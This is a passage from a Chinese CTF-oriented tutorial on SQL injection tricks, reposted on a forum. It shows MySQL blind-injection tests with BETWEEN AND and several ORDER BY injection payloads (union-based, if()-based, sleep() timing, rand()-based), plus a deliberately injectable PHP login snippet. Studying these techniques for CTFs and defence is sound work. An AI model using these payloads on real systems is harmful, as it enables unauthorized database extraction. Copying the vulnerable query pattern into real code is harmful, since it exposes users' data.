<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
<div class="line number8 index7 alt1">
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x74 </code><code class="sql color1">and</code> <code class="sql plain">0x7a; //</code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'t'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code><code class="sql plain">;</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">| </code><code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x74 </code><code class="sql color1">and</code> <code class="sql plain">0x7a |</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql plain">|    1 |</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
<div class="line number16 index15 alt1">
</div>
<div class="line number17 index16 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x75 </code><code class="sql color1">and</code> <code class="sql plain">0x7a; //</code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'u'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code><code class="sql plain">;</code>
</div>
<div class="line number18 index17 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number19 index18 alt2">
<code class="sql plain">| </code><code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x75 </code><code class="sql color1">and</code> <code class="sql plain">0x7a |</code>
</div>
<div class="line number20 index19 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number21 index20 alt2">
<code class="sql plain">|    0 |</code>
</div>
<div class="line number22 index21 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number23 index22 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<span><strong>了解order by</strong></span></p>
<p>
order by是mysql中对查询数据进行排序的方法，<br>
使用示例</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_881080">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">表名 </code><code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">列名(或者数字) </code><code class="sql keyword">asc</code><code class="sql plain">；升序(默认升序)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">表名 </code><code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">列名(或者数字) </code><code class="sql keyword">desc</code><code class="sql plain">；降序</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
这里的重点在于order by后既可以填列名或者是一个数字。举个例子：</p>
<p>
id是user表的第一列的列名，那么如果想根据id来排序，有两种写法:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_56759">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql color2">user</code> <code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">id;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">selecr * </code><code class="sql keyword">from</code> <code class="sql color2">user</code> <code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">1;</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>order by盲注</strong></p>
<p>
结合union来盲注</p>
<p>
这个是在安恒杯月赛上看到的。</p>
<p>
后台关键代码</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_222875">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">$sql = </code><code class="sql string">'select * from admin where username='</code><code class="sql string">".$username."</code><code class="sql string">''</code><code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">$result = mysql_query($sql);</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">$row = mysql_fetch_array($result);</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">if(isset($row)&&row[</code><code class="sql string">'username'</code><code class="sql plain">]!=</code><code class="sql string">"admin"</code><code class="sql plain">){</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql spaces"> </code><code class="sql plain">$hit=</code><code class="sql string">"username error!"</code><code class="sql plain">;</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">}</code><code class="sql keyword">else</code><code class="sql plain">{</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql spaces"> </code><code class="sql plain">if ($row[</code><code class="sql string">'password'</code><code class="sql plain">] === $</code><code class="sql keyword">password</code><code class="sql plain">){</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql spaces"> </code><code class="sql plain">$hit=</code><code class="sql string">""</code><code class="sql plain">;</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql spaces"> </code><code class="sql plain">}</code><code class="sql keyword">else</code><code class="sql plain">{</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql spaces"> </code><code class="sql plain">$hit=</code><code class="sql string">"password error!"</code><code class="sql plain">;</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql spaces"> </code><code class="sql plain">}</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">}</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
payload</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_731582">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">username=admin</code><code class="sql string">' union 1,2,'</code><code class="sql plain">字符串' </code><code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">3</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
sql语句就变为</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_976225">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">admin </code><code class="sql keyword">where</code> <code class="sql plain">username=</code><code class="sql string">'admin'</code> <code class="sql color1">or</code> <code class="sql plain">1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,2,</code><code class="sql keyword">binary</code> <code class="sql string">'字符串'</code> <code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">3;</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
这里就会对第三列进行比较，即将字符串和密码进行比较。然后就可以根据页面返回的不同情况进行盲注。<br>
注意的是最好加上binary，因为order by比较的时候不区分大小写。</p>
<p>
<strong>基于if()盲注</strong></p>
<p>
需要知道列名</p>
<p>
order by的列不同，返回的页面当然也是不同的，所以就可以根据排序的列不同来盲注。</p>
<p>
示例：</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_827095">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">if(1=1,id,username);</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
这里如果使用数字代替列名是不行的，因为if语句返回的是字符类型，不是整型。</p>
<p>
不需要知道列名</p>
<p>
payload</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_83890">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">if(表达式,1,(</code><code class="sql keyword">select</code> <code class="sql plain">id </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.tables))</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
如果表达式为false时，sql语句会报ERROR 1242 (21000): Subquery returns more than 1 row的错误，导致查询内容为空，如果表达式为true是，则会返回正常的页面。</p>
<p>
<strong>基于时间的盲注</strong></p>
<p>
payload</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_3341">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">if(1=1,1,sleep(1))</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
测试结果</p>
<blockquote>
<p>
select * from ha order by if(1=1,1,sleep(1)); #正常时间<br>
select * from ha order by if(1=2,1,sleep(1)); #有延迟</p>
</blockquote>
<p>
测试的时候发现延迟的时间并不是sleep(1)中的1秒，而是大于1秒。</p>
<p>
最后发现延迟的时间和所查询的数据的条数是成倍数关系的。</p>
<p>
计算公式：</p>
<blockquote>
<p>
延迟时间=sleep(1)的秒数*所查询数据条数</p>
</blockquote>
<p>
我所测试的ha表中有五条数据，所以延迟了5秒。如果查询的数据很多时，延迟的时间就会很长了。</p>
<p>
在写脚本时，可以添加timeout这一参数来避免延迟时间过长这一情况。</p>
<p>
<strong>基于rang()的盲注</strong></p>
<p>
原理不赘述了，直接看测试结果</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_694201">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">ha </code><code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">rand(</code><code class="sql keyword">true</code><code class="sql plain">);</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| id | </code><code class="sql keyword">name</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 9 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| 6 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">| 5 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">| 1 | dss |</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">| 0 | dasd |</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">ha </code><code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">rand(</code><code class="sql keyword">false</code><code class="sql plain">);</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql plain">| id | </code><code class="sql keyword">name</code> <code class="sql plain">|</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql plain">| 1 | dss |</code>
</div>
<div class="line number16 index15 alt1">
<code class="sql plain">| 6 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number17 index16 alt2">
<code class="sql plain">| 0 | dasd |</code>
</div>
<div class="line number18 index17 alt1">
<code class="sql plain">| 5 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number19 index18 alt2">
<code class="sql plain">| 9 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number20 index19 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
可以看到当rang()为true和false时，排序结果是不同的，所以就可以使用rang()函数进行盲注了。<br>
例</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_849765">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">rand(ascii(mid((</code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">()),1,1))>96)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<span><strong>后记</strong></span></p>
<p>
order by注入在crf里其实出现挺多了,一直没有总结过.这次比较全的整理了一下(自认为比较全.XD),就和between and一起发出来了.欢迎师傅交流学习.</p>
<p>
好了，以上就是这篇文章的全部内容了，希望本文的内容对大家的学习或者工作具有一定的参考学习价值，如果有疑问大家可以留言交流，谢谢大家对的支持。</p>
<p>
原文链接：https://www.anquanke.com/post/id/158674</p>

頁: [1]

琼殿技术论坛's Archiver

SQL注入的2个小Trick及示例总结